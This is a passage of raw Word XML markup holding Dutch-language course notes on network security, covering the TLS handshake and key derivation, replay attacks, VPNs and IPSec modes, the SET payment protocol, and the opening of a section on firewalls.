          <w:p w14:paraId="6F136074" w14:textId="103B195E" w:rsidR="00AC07DC" w:rsidRPr="000C39A0" w:rsidRDefault="00AC07DC" w:rsidP="00AC07D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Client stuurt finished naar Server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="556829C5" w14:textId="77777777" w:rsidR="00AC07DC" w:rsidRPr="000C39A0" w:rsidRDefault="00AC07DC" w:rsidP="00AC07D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erver stuurt ook Change Cipher Spec terug</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56A8671C" w14:textId="4E8E6820" w:rsidR="00AC07DC" w:rsidRPr="000C39A0" w:rsidRDefault="00AC07DC" w:rsidP="00AC07D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C39A0">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Server stuurt Finished tertug</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71049FDB" w14:textId="66D78E30" w:rsidR="009B2F37" w:rsidRDefault="009B2F37" w:rsidP="009B2F37">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Uit de </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2F37">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Pre-Master-Secret</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2F37">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">wordt dus de </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2F37">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Master-Secret</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2F37">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>berekend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFD3345" w14:textId="04471708" w:rsidR="00195A43" w:rsidRPr="009B2F37" w:rsidRDefault="009B2F37" w:rsidP="009B2F37">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Uit deze Master-Secret wordt de uiteindelijke </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2F37">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Encryption Key </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">en </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2F37">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>MAC Key</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2F37">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2F37">
        <w:t>berekend</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2F37">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55396A3A" w14:textId="77777777" w:rsidR="009B2F37" w:rsidRDefault="009B2F37" w:rsidP="00195A43">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A1E0E0A" w14:textId="08211C4B" w:rsidR="009B2F37" w:rsidRDefault="009B2F37" w:rsidP="009B2F37">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">De Random getallen gaan </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2F37">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Replay-Attacks </w:t>
      </w:r>
      <w:r>
        <w:t>tegen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334F9D21" w14:textId="77777777" w:rsidR="009B2F37" w:rsidRDefault="009B2F37" w:rsidP="009B2F37"/>
    <w:p w14:paraId="7491B7C1" w14:textId="5606CD48" w:rsidR="009B2F37" w:rsidRDefault="009B2F37" w:rsidP="009B2F37">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Een Repl</w:t>
      </w:r>
      <w:r w:rsidR="00AF55D7">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y-Attack is wanneer een hacker alle communicatie zal bijhouden tussen een Client en een Server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE3B7BE" w14:textId="77777777" w:rsidR="009B2F37" w:rsidRDefault="009B2F37" w:rsidP="009B2F37"/>
    <w:p w14:paraId="5319600A" w14:textId="6F38D2E4" w:rsidR="009B2F37" w:rsidRDefault="009B2F37" w:rsidP="009B2F37">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Op een ander tijdstip zal hij deze terug sturen naar de server (bv opnieuw een order plaatsen).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC08D20" w14:textId="77777777" w:rsidR="009B2F37" w:rsidRDefault="009B2F37" w:rsidP="009B2F37"/>
    <w:p w14:paraId="1AB9CE32" w14:textId="7756AA42" w:rsidR="00923144" w:rsidRDefault="009B2F37" w:rsidP="009B2F37">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Dit gaat niet aangezien er Random getallen gebruikt worden en de Server dus ook een ander Random getal gebruikt per sessie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726066DA" w14:textId="5D59BDFD" w:rsidR="009B2F37" w:rsidRDefault="00923144" w:rsidP="00923144">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:bookmarkStart w:id="11" w:name="_Toc453378500"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>VPN</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="16703C79" w14:textId="77777777" w:rsidR="00823AE8" w:rsidRDefault="00823AE8" w:rsidP="00823AE8"/>
    <w:p w14:paraId="6ACC99CA" w14:textId="72C501D4" w:rsidR="00823AE8" w:rsidRDefault="005F4FA1" w:rsidP="005F4FA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Virtual Private Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3203B5" w14:textId="6D074FD4" w:rsidR="005F4FA1" w:rsidRDefault="005F4FA1" w:rsidP="005F4FA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Eigen, afgesloten netwerk dat gebruik maakt van het internet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE4225F" w14:textId="1064B0FE" w:rsidR="005F4FA1" w:rsidRDefault="005F4FA1" w:rsidP="005F4FA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Bv in bedrijven zodat werknemers van thuis uit connectie kunen maken met het bedrijfsnetwerk en dus ook een IP-adres krijgen IN het bedrijfsnetwerk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8E767E" w14:textId="0D2E2009" w:rsidR="005F4FA1" w:rsidRDefault="005F4FA1" w:rsidP="005F4FA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>E-commerce (klanten)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E6C55D" w14:textId="4A6A74FE" w:rsidR="005F4FA1" w:rsidRDefault="005F4FA1" w:rsidP="005F4FA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Extranet (leveranciers die bv de voorraad kunnen raadplegen)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EBE5D0" w14:textId="5D088A05" w:rsidR="005F4FA1" w:rsidRDefault="005F4FA1" w:rsidP="005F4FA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Private</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8FA2EF" w14:textId="19DC4B76" w:rsidR="005F4FA1" w:rsidRDefault="005F4FA1" w:rsidP="005F4FA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Beveiligd!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6F6712" w14:textId="77777777" w:rsidR="005F4FA1" w:rsidRDefault="005F4FA1" w:rsidP="005F4FA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Virtual</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71171E72" w14:textId="7DE27E8E" w:rsidR="005F4FA1" w:rsidRDefault="005F4FA1" w:rsidP="005F4FA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Geen direct verbinding maar getunneld!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20372065" w14:textId="77777777" w:rsidR="005F4FA1" w:rsidRDefault="005F4FA1" w:rsidP="005F4FA1"/>
    <w:p w14:paraId="08EC92B0" w14:textId="5F1373C0" w:rsidR="005F4FA1" w:rsidRDefault="005F4FA1" w:rsidP="005F4FA1">
      <w:r>
        <w:t>Technologieën</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C42880" w14:textId="0F42AAFA" w:rsidR="005F4FA1" w:rsidRDefault="005F4FA1" w:rsidP="005F4FA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>PPTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084C72BB" w14:textId="3D3F3994" w:rsidR="005F4FA1" w:rsidRDefault="005F4FA1" w:rsidP="005F4FA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Point To Point Tunneling (Laag 2 OSI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A90572" w14:textId="788F03F5" w:rsidR="005F4FA1" w:rsidRPr="00FA39AA" w:rsidRDefault="005F4FA1" w:rsidP="005F4FA1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FA39AA">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>IPSec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780C9387" w14:textId="1584A638" w:rsidR="005F4FA1" w:rsidRDefault="005F4FA1" w:rsidP="005F4FA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Laag 3 OSI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA5F404" w14:textId="2197CB49" w:rsidR="005F4FA1" w:rsidRDefault="005F4FA1" w:rsidP="005F4FA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SSL/TLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FB47AB" w14:textId="77777777" w:rsidR="00AD5A7D" w:rsidRDefault="00AD5A7D" w:rsidP="00AD5A7D"/>
    <w:p w14:paraId="6577498E" w14:textId="2C4DCA2B" w:rsidR="00AD5A7D" w:rsidRDefault="00AD5A7D" w:rsidP="00AD5A7D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>IPSec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F519795" w14:textId="77777777" w:rsidR="00AD5A7D" w:rsidRDefault="00AD5A7D" w:rsidP="00AD5A7D"/>
    <w:p w14:paraId="3830FF4E" w14:textId="4EA94681" w:rsidR="00AD5A7D" w:rsidRDefault="00AD5A7D" w:rsidP="00AD5A7D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Werkt op de netwerklaag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E48EC97" w14:textId="4F02A133" w:rsidR="00AD5A7D" w:rsidRDefault="00AD5A7D" w:rsidP="00AD5A7D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Keuze tussen verschillende algoritmes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2AE609" w14:textId="77777777" w:rsidR="00E50CB5" w:rsidRDefault="00E50CB5" w:rsidP="00E50CB5"/>
    <w:p w14:paraId="63C7A467" w14:textId="22FC0E77" w:rsidR="00E50CB5" w:rsidRDefault="00E50CB5" w:rsidP="00E50CB5">
      <w:r>
        <w:t>4 keuzes maken</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC3BA81" w14:textId="77777777" w:rsidR="00E50CB5" w:rsidRDefault="00E50CB5" w:rsidP="00E50CB5"/>
    <w:p w14:paraId="01D6C773" w14:textId="595CDAAF" w:rsidR="00E50CB5" w:rsidRDefault="00E50CB5" w:rsidP="00E50CB5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Welk IPsec protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E499EC6" w14:textId="241ECC7B" w:rsidR="00E50CB5" w:rsidRDefault="00E50CB5" w:rsidP="00E50CB5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Welke symmetrische encryptie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3E53B9" w14:textId="63ED3D66" w:rsidR="00E50CB5" w:rsidRDefault="00E50CB5" w:rsidP="00E50CB5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Welke authenticatie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C975037" w14:textId="4053FB45" w:rsidR="00E50CB5" w:rsidRDefault="00E50CB5" w:rsidP="00E50CB5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Hoe de shared key afspreken</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F594FB8" w14:textId="77777777" w:rsidR="00E50CB5" w:rsidRDefault="00E50CB5" w:rsidP="00E50CB5"/>
    <w:p w14:paraId="119AD57A" w14:textId="1A8F5AA6" w:rsidR="00E50CB5" w:rsidRDefault="00E50CB5" w:rsidP="00E50CB5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>VPN Modes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFC5680" w14:textId="77777777" w:rsidR="00E50CB5" w:rsidRDefault="00E50CB5" w:rsidP="00E50CB5"/>
    <w:p w14:paraId="08954662" w14:textId="15EA865D" w:rsidR="00E50CB5" w:rsidRPr="00FA39AA" w:rsidRDefault="00E50CB5" w:rsidP="00E50CB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FA39AA">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Transport Mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61315EAC" w14:textId="10DF1560" w:rsidR="00E50CB5" w:rsidRDefault="00E50CB5" w:rsidP="00E50CB5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Behoudt de originele IP-header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1881B0A4" w14:textId="42623FBF" w:rsidR="00FE4367" w:rsidRDefault="00FE4367" w:rsidP="00E50CB5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Gebruiken indien het niet belangrijk is om je IP te verbergen!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043B9598" w14:textId="337489EB" w:rsidR="00E50CB5" w:rsidRPr="00FA39AA" w:rsidRDefault="00E50CB5" w:rsidP="00E50CB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FA39AA">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Tunnel Mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CEA9ED" w14:textId="2B9FB417" w:rsidR="00923144" w:rsidRDefault="00E50CB5" w:rsidP="00923144">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Strip</w:t>
      </w:r>
      <w:r w:rsidR="00156C38">
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de originele IP-header</w:t>
      </w:r>
      <w:r w:rsidR="0089778D">
        <w:t xml:space="preserve"> en maakt een nieuwe aan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09ADD260" w14:textId="12942712" w:rsidR="00A81AB3" w:rsidRDefault="00A81AB3" w:rsidP="00A81AB3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Encapsuleren</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6C5209" w14:textId="58ABA47F" w:rsidR="00A81AB3" w:rsidRDefault="00A81AB3" w:rsidP="00A81AB3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Origineel IP-adres wordt dus niet meegenomen!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F441963" w14:textId="1D7717E9" w:rsidR="009F4998" w:rsidRDefault="009F4998" w:rsidP="009F4998">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:bookmarkStart w:id="12" w:name="_Toc453378501"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Secure Electronic Transaction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="37B5B47C" w14:textId="77777777" w:rsidR="0072774E" w:rsidRDefault="0072774E" w:rsidP="0072774E"/>
    <w:p w14:paraId="50D9BAC2" w14:textId="0A7058EC" w:rsidR="0072774E" w:rsidRDefault="004B0593" w:rsidP="004B0593">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDBE1C0" w14:textId="6EE25575" w:rsidR="004B0593" w:rsidRPr="00972A6D" w:rsidRDefault="004B0593" w:rsidP="004B0593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72A6D">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>= Encryptie op de Applicatielaag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5729850E" w14:textId="228C756A" w:rsidR="004B0593" w:rsidRDefault="004B0593" w:rsidP="004B0593">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Was bedoeld als standaard voor betalingen via creditcards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01812ED1" w14:textId="5FA32DF7" w:rsidR="004B0593" w:rsidRDefault="004B0593" w:rsidP="004B0593">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Verkoper en koper moeten over certificaat beschikken</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EDAA18" w14:textId="5169A6FF" w:rsidR="004B0593" w:rsidRDefault="004B0593" w:rsidP="004B0593">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Partijen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0123B1D3" w14:textId="55BE54C4" w:rsidR="004B0593" w:rsidRDefault="004B0593" w:rsidP="004B0593">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Cardholder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D385915" w14:textId="43431EA8" w:rsidR="004B0593" w:rsidRDefault="004B0593" w:rsidP="004B0593">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Issuer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C6D0C1" w14:textId="5A370125" w:rsidR="004B0593" w:rsidRDefault="004B0593" w:rsidP="004B0593">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Merchant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FBE2C3" w14:textId="05D06618" w:rsidR="004B0593" w:rsidRDefault="000D1B07" w:rsidP="004B0593">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Acquirer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B33CC07" w14:textId="14264AA4" w:rsidR="004B0593" w:rsidRDefault="004B0593" w:rsidP="004B0593">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Payment Gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3518D168" w14:textId="4DF262F4" w:rsidR="004B0593" w:rsidRDefault="004B0593" w:rsidP="004B0593">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>CA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0A3079" w14:textId="2417BEA9" w:rsidR="004B0593" w:rsidRDefault="004B0593" w:rsidP="004B0593">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Wordt niet meer gebruikt in de praktijk omdat VISA zijn eigen systeem heeft ontwikkeld (3DSecure).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177FFCF3" w14:textId="0CF1D731" w:rsidR="004B0593" w:rsidRDefault="004B0593" w:rsidP="004B0593">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Wegens de </w:t>
      </w:r>
      <w:r w:rsidRPr="00972A6D">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>VISA-garantie</w:t>
      </w:r>
      <w:r w:rsidRPr="00972A6D">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>gebruikt iedereen dit systeem, ook al is het technisch minder goed SET.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D331C44" w14:textId="5CD05FC0" w:rsidR="003263B9" w:rsidRDefault="003263B9" w:rsidP="004B0593">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Voor een eigen webshop Ogone gebruiken, dan val je ook onder de VISA-garantie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54229E58" w14:textId="77777777" w:rsidR="004C1251" w:rsidRDefault="004C1251" w:rsidP="004C1251"/>
    <w:p w14:paraId="338A4A4B" w14:textId="5B50DD83" w:rsidR="004C1251" w:rsidRDefault="004C1251" w:rsidP="004C1251">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc453378502"/>
      <w:r>
        <w:t>Firewalls</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="484EC241" w14:textId="77777777" w:rsidR="004C1251" w:rsidRDefault="004C1251" w:rsidP="004C1251"/>
    <w:p w14:paraId="107F2563" w14:textId="6CA6EBDA" w:rsidR="004C1251" w:rsidRDefault="00A26D74" w:rsidP="00A26D74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Toegangscontrole voor het n</w:t>
      </w:r>
      <w:r w:rsidR="00F67772">
        <w:t>et</w:t>
      </w:r>
      <w:r>
        <w:t>werk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316AAB3E" w14:textId="32F2A167" w:rsidR="00A26D74" w:rsidRDefault="00A26D74" w:rsidP="00A26D74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Gebruikt “rules”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2126BA1F" w14:textId="32386ECE" w:rsidR="00A26D74" w:rsidRDefault="00A26D74" w:rsidP="00A26D74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EDEA0B" w14:textId="1EDA6BAC" w:rsidR="00A26D74" w:rsidRDefault="00A26D74" w:rsidP="00A26D74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
